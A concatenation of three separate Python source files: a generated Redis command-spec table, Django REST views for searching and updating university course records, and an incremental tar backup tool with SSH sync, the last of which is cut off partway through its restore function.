'flags': ['readonly', 'loading', 'stale'],
'key_spec': (0, 0, 0)},
'KEYS': {'arity': 2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (0, 0, 0)},
'LASTSAVE': {'arity': 1L,
'flags': ['readonly', 'random', 'fast'],
'key_spec': (0, 0, 0)},
'LATENCY': {'arity': -2L,
'flags': ['readonly',
'admin',
'noscript',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'LINDEX': {'arity': 3L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'LINSERT': {'arity': 5L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'LLEN': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'LPOP': {'arity': 2L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'LPUSH': {'arity': -3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'LPUSHX': {'arity': 3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'LRANGE': {'arity': 4L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'LREM': {'arity': 4L, 'flags': ['write'], 'key_spec': (1, 1, 1)},
'LSET': {'arity': 4L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'LTRIM': {'arity': 4L, 'flags': ['write'], 'key_spec': (1, 1, 1)},
'MGET': {'arity': -2L, 'flags': ['readonly'], 'key_spec': (1, -1, 1)},
'MIGRATE': {'arity': 6L,
'flags': ['write', 'admin'],
'key_spec': (0, 0, 0)},
'MONITOR': {'arity': 1L,
'flags': ['readonly', 'admin', 'noscript'],
'key_spec': (0, 0, 0)},
'MOVE': {'arity': 3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'MSET': {'arity': -3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, -1, 2)},
'MSETNX': {'arity': -3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, -1, 2)},
'MULTI': {'arity': 1L,
'flags': ['readonly', 'noscript', 'fast'],
'key_spec': (0, 0, 0)},
'OBJECT': {'arity': 3L, 'flags': ['readonly'], 'key_spec': (2, 2, 2)},
'PERSIST': {'arity': 2L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'PEXPIRE': {'arity': 3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'PEXPIREAT': {'arity': 3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'PFADD': {'arity': -2L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'PFCOUNT': {'arity': -2L, 'flags': ['write'], 'key_spec': (1, 1, 1)},
'PFDEBUG': {'arity': -3L, 'flags': ['write'], 'key_spec': (0, 0, 0)},
'PFMERGE': {'arity': -2L,
'flags': ['write', 'denyoom'],
'key_spec': (1, -1, 1)},
'PFSELFTEST': {'arity': 1L,
'flags': ['readonly'],
'key_spec': (0, 0, 0)},
'PING': {'arity': 1L,
'flags': ['readonly', 'stale', 'fast'],
'key_spec': (0, 0, 0)},
'PSETEX': {'arity': 4L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'PSUBSCRIBE': {'arity': -2L,
'flags': ['readonly',
'pubsub',
'noscript',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'PSYNC': {'arity': 3L,
'flags': ['readonly', 'admin', 'noscript'],
'key_spec': (0, 0, 0)},
'PTTL': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'PUBLISH': {'arity': 3L,
'flags': ['readonly',
'pubsub',
'loading',
'stale',
'fast'],
'key_spec': (0, 0, 0)},
'PUBSUB': {'arity': -2L,
'flags': ['readonly',
'pubsub',
'random',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'PUNSUBSCRIBE': {'arity': -1L,
'flags': ['readonly',
'pubsub',
'noscript',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'RANDOMKEY': {'arity': 1L,
'flags': ['readonly', 'random'],
'key_spec': (0, 0, 0)},
'RENAME': {'arity': 3L, 'flags': ['write'], 'key_spec': (1, 2, 1)},
'RENAMENX': {'arity': 3L,
'flags': ['write', 'fast'],
'key_spec': (1, 2, 1)},
'REPLCONF': {'arity': -1L,
'flags': ['readonly',
'admin',
'noscript',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'RESTORE': {'arity': 4L,
'flags': ['write', 'denyoom', 'admin'],
'key_spec': (1, 1, 1)},
'ROLE': {'arity': 1L,
'flags': ['admin', 'noscript', 'loading', 'stale'],
'key_spec': (0, 0, 0)},
'RPOP': {'arity': 2L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'RPOPLPUSH': {'arity': 3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 2, 1)},
'RPUSH': {'arity': -3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'RPUSHX': {'arity': 3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'SADD': {'arity': -3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'SAVE': {'arity': 1L,
'flags': ['readonly', 'admin', 'noscript'],
'key_spec': (0, 0, 0)},
'SCAN': {'arity': -2L,
'flags': ['readonly', 'random'],
'key_spec': (0, 0, 0)},
'SCARD': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'SCRIPT': {'arity': -2L,
'flags': ['readonly', 'admin', 'noscript'],
'key_spec': (0, 0, 0)},
'SDIFF': {'arity': -2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (1, -1, 1)},
'SDIFFSTORE': {'arity': -3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, -1, 1)},
'SELECT': {'arity': 2L,
'flags': ['readonly', 'loading', 'fast'],
'key_spec': (0, 0, 0)},
'SET': {'arity': -3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'SETBIT': {'arity': 4L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'SETEX': {'arity': 4L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'SETNX': {'arity': 3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'SETRANGE': {'arity': 4L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'SHUTDOWN': {'arity': -1L,
'flags': ['readonly', 'admin', 'loading', 'stale'],
'key_spec': (0, 0, 0)},
'SINTER': {'arity': -2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (1, -1, 1)},
'SINTERSTORE': {'arity': -3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, -1, 1)},
'SISMEMBER': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'SLAVEOF': {'arity': 3L,
'flags': ['admin', 'noscript', 'stale'],
'key_spec': (0, 0, 0)},
'SLOWLOG': {'arity': -2L, 'flags': ['readonly'], 'key_spec': (0, 0, 0)},
'SMEMBERS': {'arity': 2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (1, 1, 1)},
'SMOVE': {'arity': 4L,
'flags': ['write', 'fast'],
'key_spec': (1, 2, 1)},
'SORT': {'arity': -2L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'SPOP': {'arity': 2L,
'flags': ['write', 'noscript', 'random', 'fast'],
'key_spec': (1, 1, 1)},
'SRANDMEMBER': {'arity': -2L,
'flags': ['readonly', 'random'],
'key_spec': (1, 1, 1)},
'SREM': {'arity': -3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'SSCAN': {'arity': -3L,
'flags': ['readonly', 'random'],
'key_spec': (1, 1, 1)},
'STRLEN': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'SUBSCRIBE': {'arity': -2L,
'flags': ['readonly',
'pubsub',
'noscript',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'SUBSTR': {'arity': 4L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'SUNION': {'arity': -2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (1, -1, 1)},
'SUNIONSTORE': {'arity': -3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, -1, 1)},
'SYNC': {'arity': 1L,
'flags': ['readonly', 'admin', 'noscript'],
'key_spec': (0, 0, 0)},
'TIME': {'arity': 1L,
'flags': ['readonly', 'random', 'fast'],
'key_spec': (0, 0, 0)},
'TTL': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'TYPE': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'UNSUBSCRIBE': {'arity': -1L,
'flags': ['readonly',
'pubsub',
'noscript',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'UNWATCH': {'arity': 1L,
'flags': ['readonly', 'noscript', 'fast'],
'key_spec': (0, 0, 0)},
'WATCH': {'arity': -2L,
'flags': ['readonly', 'noscript', 'fast'],
'key_spec': (1, -1, 1)},
'ZADD': {'arity': -4L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'ZCARD': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'ZCOUNT': {'arity': 4L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'ZINCRBY': {'arity': 4L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'ZINTERSTORE': {'arity': -4L,
'flags': ['write', 'denyoom', 'movablekeys'],
'key_spec': (0, 0, 0)},
'ZLEXCOUNT': {'arity': 4L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'ZRANGE': {'arity': -4L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'ZRANGEBYLEX': {'arity': -4L,
'flags': ['readonly'],
'key_spec': (1, 1, 1)},
'ZRANGEBYSCORE': {'arity': -4L,
'flags': ['readonly'],
'key_spec': (1, 1, 1)},
'ZRANK': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'ZREM': {'arity': -3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'ZREMRANGEBYLEX': {'arity': 4L,
'flags': ['write'],
'key_spec': (1, 1, 1)},
'ZREMRANGEBYRANK': {'arity': 4L,
'flags': ['write'],
'key_spec': (1, 1, 1)},
'ZREMRANGEBYSCORE': {'arity': 4L,
'flags': ['write'],
'key_spec': (1, 1, 1)},
'ZREVRANGE': {'arity': -4L,
'flags': ['readonly'],
'key_spec': (1, 1, 1)},
'ZREVRANGEBYLEX': {'arity': -4L,
'flags': ['readonly'],
'key_spec': (1, 1, 1)},
'ZREVRANGEBYSCORE': {'arity': -4L,
'flags': ['readonly'],
'key_spec': (1, 1, 1)},
'ZREVRANK': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'ZSCAN': {'arity': -3L,
'flags': ['readonly', 'random'],
'key_spec': (1, 1, 1)},
'ZSCORE': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'ZUNIONSTORE': {'arity': -4L,
'flags': ['write', 'denyoom', 'movablekeys'],
'key_spec': (0, 0, 0)}}
if __name__ == '__main__':
    # Regenerate this module's COMMANDS table from a live Redis server.
    # Running the file directly connects to a local Redis, issues the
    # COMMAND introspection call, and rewrites this file in place, keeping
    # everything from this __main__ guard downward verbatim.
    import redis
    import pprint
    rv = {}
    for row in redis.Redis().execute_command('COMMAND'):
        # Each COMMAND reply row: name, arity, flags, first key, last key,
        # key step.
        cmd, arity, flags, first_key, last_key, step_count = row
        rv[cmd.upper()] = {
            'arity': arity,
            'flags': flags,
            'key_spec': (int(first_key), int(last_key), int(step_count)),
        }
    tail = []
    # __file__ may point at the compiled .pyc/.pyo; rstrip('co') maps it
    # back to the .py source before rewriting.
    with open(__file__.rstrip('co'), 'r+') as f:
        for line in f:
            if line.strip() == "if __name__ == '__main__':":
                tail.append(line)
                tail.extend(f)  # keep the remainder of the file unchanged
                break
        f.seek(0)
        f.truncate(0)
        f.write('# flake8: noqa\n\nCOMMANDS = %s\n\n\n%s' % (
            pprint.pformat(rv, width=74),
            ''.join(tail)))
| |
# Copyright 2022 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from sis_provisioner.dao.course import (
get_sections_by_instructor_and_term, valid_academic_course_sis_id,
valid_adhoc_course_sis_id)
from sis_provisioner.dao.term import get_term_by_year_and_quarter
from sis_provisioner.dao.user import get_person_by_netid, get_person_by_regid
from sis_provisioner.models.group import Group
from sis_provisioner.models.course import Course
from sis_provisioner.views.admin import RESTDispatch
from sis_provisioner.exceptions import CoursePolicyException
from logging import getLogger
import json
import re
logger = getLogger(__name__)
class CourseInvalidException(Exception):
    """Raised when a course search request contains invalid filter criteria."""
    pass
class CourseView(RESTDispatch):
    """ Performs actions on a Course at /api/v1/course/<course id>.
    GET returns 200 with Course details.
    PUT returns 200 and updates the Course information.
    """
    def get(self, request, *args, **kwargs):
        # Look the course up by its normalized sis id; 404 when unknown.
        try:
            course = Course.objects.get(
                course_id=self._normalize(kwargs['course_id']))
            # Only users allowed to view source data get SWS links included.
            json_data = course.json_data(
                include_sws_url=self.can_view_source_data(request))
            return self.json_response(json_data)
        except Course.DoesNotExist:
            return self.error_response(404, "Course not found")

    def put(self, request, *args, **kwargs):
        try:
            course = Course.objects.get(
                course_id=self._normalize(kwargs['course_id']))
        except Course.DoesNotExist:
            return self.error_response(404, "Course not found")

        # A non-null queue_id means a provisioning job currently owns this
        # course; refuse concurrent modification.
        if course.queue_id is not None:
            return self.error_response(409, "Course already being provisioned")

        body = request.read()
        try:
            new_values = json.loads(body)
        except Exception as err:
            return self.error_response(400, "Unable to parse JSON: {}".format(
                err))

        try:
            # only priority PUTable right now
            priority = new_values.get('priority', '').lower()
            course.update_priority(priority)
            json_data = course.json_data(
                include_sws_url=self.can_view_source_data(request))
            return self.json_response(json_data)
        except CoursePolicyException as err:
            return self.error_response(400, err)

    def _normalize(self, course):
        """ normalize course id case

        Academic course ids keep their original case; ids that only pass
        the ad hoc course policy are lower-cased.  Ids matching neither
        policy are returned stripped but otherwise untouched.
        """
        course = course.strip()
        try:
            valid_academic_course_sis_id(course)
        except CoursePolicyException:
            try:
                valid_adhoc_course_sis_id(course.lower())
                return course.lower()
            except CoursePolicyException:
                pass
        return course
class CourseListView(RESTDispatch):
    """ Retrieves a list of Courses at /api/v1/courses/?<criteria[&criteria]>.
    GET returns 200 with Course details.
    """
    def __init__(self):
        # NOTE(review): the base class __init__ is not chained here —
        # confirm RESTDispatch/View tolerates that.
        # Ordered filter criteria used to build a course_id prefix
        # ("<term>-<curric>-<number>-<section>"); order matters because the
        # values are joined positionally in _valid_course_filter().
        self._criteria = [
            {
                'term': 'year',
                'test': re.compile(r'^\d{4}$').match,
                'required': True
            },
            {
                'term': 'quarter',
                'test': re.compile(
                    r'^(?:winter|spring|summer|autumn)+$', re.I).match,
                'required': True,
                'case': 'lower'
            },
            {
                'term': 'curriculum_abbreviation',
                'test': re.compile(r'^[a-z &]+$', re.I).match,
                'case': 'upper'
            },
            {
                'term': 'course_number',
                'test': re.compile(r'^\d{3}$').match,
            },
            {
                'term': 'section',
                'test': re.compile(r'^[a-z]{1,2}$', re.I).match,
                'case': 'upper'
            }
        ]

    def get(self, request, *args, **kwargs):
        json_rep = {
            'courses': []
        }
        filt_kwargs = None
        # Mode 1: courses attached to a specific provisioning queue.
        if 'queue_id' in request.GET:
            queue_id = request.GET.get('queue_id', '').strip()
            if re.match(r'^[0-9]+$', str(queue_id)):
                filt_kwargs = {'queue_id': queue_id}
            else:
                err = 'invalid queue_id: {}'.format(queue_id)
                logger.error(err)
                return self.error_response(400, err)
        else:
            # Mode 2: courses whose provisioning errored and that are not
            # currently queued.
            provisioned_error = request.GET.get('provisioned_error')
            if provisioned_error:
                filt_kwargs = {
                    'provisioned_error': self._is_true(provisioned_error),
                    'queue_id__isnull': True
                }

        if filt_kwargs:
            try:
                filt_kwargs['priority__gt'] = Course.PRIORITY_NONE
                course_list = list(Course.objects.filter(
                    **filt_kwargs).order_by('course_id'))
                include_sws_url = self.can_view_source_data(request)
                for course in course_list:
                    json_data = course.json_data(include_sws_url)
                    json_rep['courses'].append(json_data)
                return self.json_response(json_rep)
            except Exception as err:
                logger.error('Course search fail: {}'.format(err))
                return self.error_response(400, err)

        # Mode 3: filter by term/curriculum criteria, optionally scoped to
        # a single instructor identified by net_id or reg_id.
        net_id = None
        reg_id = None
        try:
            if 'net_id' in request.GET:
                net_id = self.netid_from_request(request.GET)
            elif 'reg_id' in request.GET:
                reg_id = self.regid_from_request(request.GET)
            else:
                # Without an instructor, also require the curriculum
                # abbreviation so the prefix stays selective.
                self._criteria[2]['required'] = True

            filter_terms = self._valid_course_filter(request)
            filter_prefix = '-'.join(filter_terms)
            course_list = list(Course.objects.filter(
                course_id__startswith=filter_prefix).order_by('course_id'))
        except CourseInvalidException as err:
            return self.error_response(400, err)
        except Exception as err:
            logger.error('Course filter fail: {}'.format(err))
            return self.error_response(400, err)

        if (net_id is not None or reg_id is not None) and len(course_list):
            try:
                if net_id is not None:
                    instructor = get_person_by_netid(net_id)
                else:
                    instructor = get_person_by_regid(reg_id)

                year = request.GET.get('year')
                quarter = request.GET.get('quarter')
                term = get_term_by_year_and_quarter(year, quarter)

                # Collect the course ids this instructor actually teaches
                # in the requested term.
                valid = []
                for section in get_sections_by_instructor_and_term(
                        instructor, term):
                    valid.append('-'.join([
                        section.term.canvas_sis_id(),
                        section.curriculum_abbr.upper(),
                        section.course_number,
                        section.section_id.upper()]))
            except Exception as err:
                logger.error('Section search fail: {}'.format(err))
                return self.error_response(400, err)

        include_sws_url = self.can_view_source_data(request)
        for course in course_list:
            # NOTE(review): 'valid' only exists when the instructor branch
            # above ran; the locals() probe works but an explicit sentinel
            # initialized before the branch would be clearer.
            if 'valid' in locals() and course.course_id not in valid:
                continue
            json_data = course.json_data(include_sws_url)
            json_rep['courses'].append(json_data)

        return self.json_response(json_rep)

    def _valid_course_filter(self, request):
        """Validate the criteria query terms in order and return the list
        of normalized values to join into a course_id prefix.

        Raises CourseInvalidException when a required term is missing or a
        supplied term fails its pattern test.
        """
        values = []
        for filter in self._criteria:
            value = request.GET.get(filter['term'], '').strip()
            if value is None or not len(value):
                if 'required' in filter and filter['required'] is True:
                    raise CourseInvalidException(
                        '{} query term is required'.format(filter['term']))
                else:
                    # Criteria are positional: stop at the first gap.
                    break
            elif filter['test'](value):
                if 'case' in filter:
                    if filter['case'] == 'upper':
                        value = value.upper()
                    else:
                        value = value.lower()
                values.append(value)
            else:
                raise CourseInvalidException('{} is invalid'.format(
                    filter['term']))
        return values

    def _is_true(self, val):
        """Interpret '1', 'yes' or 'true' (case-insensitive) as True."""
        return True if (
            val == '1' or re.match(r'^(yes|true)$', val, re.I)) else False
| |
#!/usr/bin/env python3
"""
File: tar-smart-backup.py
Author: Evgeniy Klemin
Email: evgeniy.klemin@gmail.com
Github: https://github.com/evgeniy-klemin/tar-smart-backup
Description: Backup directory by incremental tar
"""
import argparse
import sys
import subprocess
import os
import errno
import shutil
import logging
import paramiko
logging.basicConfig(stream=sys.stdout, level=logging.ERROR)
logger = logging.getLogger(__name__)
# Shell command templates for the incremental tar backup/restore runs.
# ``--listed-incremental`` keeps a snapshot (.snar) file so successive runs
# archive only what changed since the snapshot was last updated.
# Bug fix: both templates contained a literal "(unknown)" where the
# ``{filename}`` placeholder belongs — the .format(filename=...) calls in
# backup_full()/backup_incremental()/restore() never had any effect and tar
# was handed a bogus archive name.
TAR_COMMAND_BACKUP = "/bin/tar --file={filename} --listed-incremental={snap} --ignore-failed-read --one-file-system --recursion --preserve-permissions -C {source_dir_parent} -cpz {source_dir_basename}"
TAR_COMMAND_RESTORE = "/bin/tar --extract --strip-components 1 --ignore-failed-read --preserve-permissions --recursion --listed-incremental={snap} --file {filename} -C {destination_dir}"
# Common suffix of every archive this tool creates.
EXT = '.tar.gz'
class DefaultHelpParser(argparse.ArgumentParser):
    """Argument parser that prints the full help text whenever parsing fails."""

    def __init__(self, *args, **kwargs):
        # Show argument defaults in --help unless the caller explicitly
        # chose a different formatter.
        kwargs.setdefault('formatter_class',
                          argparse.ArgumentDefaultsHelpFormatter)
        super(DefaultHelpParser, self).__init__(*args, **kwargs)

    def error(self, message):
        sys.stderr.write('error: %s\n' % message)
        self.print_help()
        sys.exit(2)


def create_argparse():
    """Build the CLI: shared SSH options plus ``backup``/``restore`` sub-commands."""
    p = DefaultHelpParser(description='Backup directory.')
    p.add_argument('name', help='Name of backup')
    p.add_argument('--sync', action='store_true',
                   help='Sync with remote throuh ssh')
    p.add_argument('--ssh-key-rsa', help='Private RSA key')
    p.add_argument('--ssh-host', help='SSH host')
    p.add_argument('--ssh-port', default=22, help='SSH port')
    p.add_argument('--ssh-user', default='app', help='SSH port')
    p.add_argument('--remote-dir', default='/home/app/backups',
                   help='Dir in remote backup server')
    actions = p.add_subparsers(dest='action', help='Action')
    backup_cmd = actions.add_parser('backup', help='Backup')
    backup_cmd.add_argument('src', help='Directory for backup (source)')
    backup_cmd.add_argument('--levels', type=int, default=4,
                            help='Max snapshot levels')
    backup_cmd.add_argument('--count', type=int, default=5,
                            help='Count snapshots on each levels')
    backup_cmd.add_argument('--dst', default='.', help='Where hold backups')
    restore_cmd = actions.add_parser('restore', help='Restore')
    restore_cmd.add_argument('dst', help='Directory for extract (destination)')
    restore_cmd.add_argument('--src', default='.', help='Where hold backups')
    return p
def main():
    """CLI entry point: run the selected sub-command and exit with its code."""
    args = create_argparse().parse_args()
    handlers = {'backup': backup, 'restore': restore}
    handler = handlers.get(args.action)
    if handler is not None:
        sys.exit(handler(args))
    sys.exit(1)  # no recognised sub-command given
def silentremove(filename):
    """Delete *filename* from disk; a missing file is not an error."""
    try:
        os.remove(filename)
    except OSError as err:
        # Tolerate only "no such file"; propagate every other failure.
        if err.errno == errno.ENOENT:
            return
        raise
def backup_full(args):
    """Create a level-0 (full) backup of ``args.src``.

    Any previous level-0 snapshot/archive for this backup name is removed
    first so tar starts a brand new incremental chain.

    Returns:
        tuple(int, str, str): tar exit code, archive filename, snar filename
    """
    snap = "{}-snar-0".format(args.name)
    snap_path = os.path.join(args.dst, snap)
    # Use the shared EXT constant instead of a hard-coded suffix, for
    # consistency with is_arch()/parse_filename().
    filename = "{}{}".format(args.name, EXT)
    file_path = os.path.join(args.dst, filename)
    # Drop stale level-0 state: tar must not see an old snapshot file.
    silentremove(snap_path)
    silentremove(file_path)
    # Archive the source directory relative to its parent so the archive
    # holds a single top-level directory entry.
    source_dir_parent = os.path.abspath(os.path.join(args.src, os.pardir))
    source_dir_basename = os.path.basename(args.src)
    command = TAR_COMMAND_BACKUP.format(
        filename=file_path, snap=snap_path,
        source_dir_parent=source_dir_parent,
        source_dir_basename=source_dir_basename
    )
    logger.debug("shell command: {}".format(command))
    rc = subprocess.call(command, shell=True)
    return (rc, filename, snap)
def backup_incremental(args, levels):
    """Create an incremental backup at depth ``len(levels)``.

    ``levels`` holds the archive number chosen for each level (as built by
    ``backup()``); the last entry is the number of the archive to write.

    Returns:
        tuple(int, str, str): tar exit code, archive filename, snar filename
    """
    level = len(levels)
    # NOTE(review): this value is shadowed by the loop variable below and
    # never read — looks vestigial.
    num = levels[len(levels) - 1]
    parent_snap = "{}-snar-{}".format(args.name, level - 1)
    parent_snap = os.path.join(args.dst, parent_snap)
    snap = "{}-snar-{}".format(args.name, level)
    snap_path = os.path.join(args.dst, snap)
    old_snap = "{}-snar-{}.old".format(args.name, level)
    old_snap = os.path.join(args.dst, old_snap)
    # First archive at this depth: seed this level's snapshot from the
    # parent level so tar records only changes since the parent backup.
    if not os.path.isfile(snap_path):
        shutil.copyfile(parent_snap, snap_path)
    # Keep a pristine ".old" copy of the snapshot; tar mutates the live one.
    silentremove(old_snap)
    shutil.copyfile(snap_path, old_snap)
    # Archive name encodes the whole level path, e.g. "name_01_03.tar.gz".
    filename = args.name
    for num in levels:
        filename += "_{:0>2}".format(num)
    filename += ".tar.gz"
    file_path = os.path.join(args.dst, filename)
    source_dir_parent = os.path.abspath(os.path.join(args.src, os.pardir))
    source_dir_basename = os.path.basename(args.src)
    command = TAR_COMMAND_BACKUP.format(
        filename=file_path, snap=snap_path, source_dir_parent=source_dir_parent,
        source_dir_basename=source_dir_basename
    )
    logger.debug("shell command: {}".format(command))
    rc = subprocess.call(command, shell=True)
    return (rc, filename, snap)
def is_snap(name, filename):
    """Return True when *filename* is a snapshot (.snar) file for *name*.

    >>> is_snap('mybackup', 'mybackup-snar-0')
    True
    >>> is_snap('mybackup', 'mybackup-snar-1')
    True
    """
    return filename.startswith(name + '-snar-')
def is_arch(name, filename):
    """Return True when *filename* is an archive file belonging to *name*.

    >>> is_arch('mybackup', 'mybackup.tar.gz')
    True
    >>> is_arch('mybackup', 'mybackup_01.tar.gz')
    True
    """
    # Archive files share the backup-name prefix and the EXT suffix.
    # (The old body computed an unused local ``ln`` and sliced by hand;
    # startswith/endswith express the same test directly.)
    return filename.startswith(name) and filename.endswith(EXT)
def find_files(name, destination_dir):
    """Return the archive filenames for *name* in *destination_dir*, sorted.

    Returns:
        list
    """
    entries = os.listdir(destination_dir)
    return sorted(entry for entry in entries if is_arch(name, entry))
def find_snap_files(name, destination_dir):
    """Return the snapshot (.snar) filenames for *name*, sorted.

    Returns:
        list
    """
    entries = os.listdir(destination_dir)
    return sorted(entry for entry in entries if is_snap(name, entry))
def parse_filename(name, filename):
    """Extract the per-level archive numbers from an archive filename.

    Examples:
        >>> list(parse_filename('data', 'data_01_03.tar.gz'))
        [(0, 1), (1, 3)]
        >>> list(parse_filename('data', 'data_02_05_01.tar.gz'))
        [(0, 2), (1, 5), (2, 1)]

    Yields:
        tuple(int, int): (level index, archive number)
    """
    # Strip the "<name>_" prefix and the EXT suffix, leaving "01_03"-style
    # level tokens (for a full backup this leaves a non-numeric remainder,
    # which terminates the loop immediately).
    middle = filename[len(name) + 1:-len(EXT)]
    for index, token in enumerate(middle.split('_')):
        try:
            number = int(token)
        except ValueError:
            break
        yield (index, number)
def scan_dir(name, destination_dir):
    """Return the maximum archive number seen at each level on disk.

    Examples:
        destination_dir content:
            data.tar.gz
            data_01.tar.gz
            data_01_01.tar.gz
            data_01_02.tar.gz
            data_01_03.tar.gz
        scan_dir('data', destination_dir)
        [1, 3]
        1: LEVEL-1 depth=1 num=1
        3: LEVEL-1 depth=2 num=3

    Returns:
        list, or None when no archive for *name* exists at all
    """
    archives = find_files(name, destination_dir)
    if not archives:
        return None
    maxima = []
    for archive in archives:
        for depth, number in parse_filename(name, archive):
            if depth < len(maxima):
                maxima[depth] = max(maxima[depth], number)
            else:
                maxima.append(number)
    return maxima
def find_files_for_delete(name, destination_dir, levels):
    """Find the archives made obsolete by truncating the chain to ``levels``.

    An archive qualifies when any of its level indices lies at or beyond
    the last level in ``levels``.

    Bug fix: the previous version appended ``filename`` once per matching
    level index, so deeper archives appeared several times in the result
    and the caller (``backup``) crashed trying to ``os.remove`` the same
    file twice.  Each filename is now listed at most once.

    Returns:
        list: archive filenames to delete
    """
    found = find_files(name, destination_dir)
    res = []
    for filename in found:
        if any(part_index > len(levels) - 2
               for part_index, _value in parse_filename(name, filename)):
            res.append(filename)
    return res
def backup(args):
    """Backup directory.

    Chooses between a full and an incremental backup based on the archives
    already present in ``args.dst``, rotating levels whose archive count
    exceeded ``args.count``, then optionally syncs the result over SSH.
    """
    levels = scan_dir(args.name, args.dst)
    create_full = False
    new_levels = list(levels) if levels else []
    old_files_for_delete = []
    if levels is None:
        # Nothing on disk yet: start a new chain with a full backup.
        create_full = True
    else:
        if not levels:
            # Only the level-0 archive exists: open level 1.
            new_levels.append(1)
        else:
            level = len(levels)
            if level < args.levels - 1:
                # Still below the configured max depth: go one level deeper.
                new_levels.append(1)
            else:
                # Max depth reached: pop levels whose archive count hit
                # args.count, collecting their now-obsolete archives.
                last_num = new_levels[len(new_levels) - 1]
                while last_num > args.count - 1:
                    old_files_for_delete += find_files_for_delete(args.name,
                                                                  args.dst,
                                                                  new_levels)
                    new_levels = new_levels[:-1]
                    if new_levels:
                        last_num = new_levels[len(new_levels) - 1]
                    else:
                        # Every level exhausted: restart with a full backup.
                        create_full = True
                        break
                if new_levels:
                    # Next archive number at the surviving level.
                    new_levels[len(new_levels) - 1] += 1
    if create_full:
        logger.info("Create full backup, args: {}".format(args))
        rc, filename, snap = backup_full(args)
    else:
        logger.info("Create incremental backup, args: {}".format(args))
        rc, filename, snap = backup_incremental(args, new_levels)
    if rc == 0:
        if args.sync:
            upload_file(filename, args)
            upload_file(snap, args)
        # Only delete the rotated archives once the new backup succeeded.
        for filename in old_files_for_delete:
            os.remove(os.path.join(args.dst, filename))
        if args.sync and old_files_for_delete:
            remote_delete(old_files_for_delete, args)
        logger.info("Backup {} successed".format(args.name))
        if args.sync:
            sync_remote(args)
    else:
        logger.error("Backup with args: {} error".format(args))
    return rc
def restore(args):
    """Restore backup to directory.

    Downloads the archives first when --sync is given, then replays every
    archive in sorted order (full backup, then each incremental) into
    ``args.dst``.  Stops at the first tar failure.
    """
    if args.sync:
        download_files(args)
    found = find_files(args.name, args.src)
    if not os.path.exists(args.dst):
        os.makedirs(args.dst)
    snap = ''
    for filename in found:
        # The number of parsed level components selects the matching
        # snapshot (.snar) file for this archive.
        parts = list(parse_filename(args.name, filename))
        snap = "{}-snar-{}".format(args.name, len(parts))
        snap = os.path.join(args.src, snap)
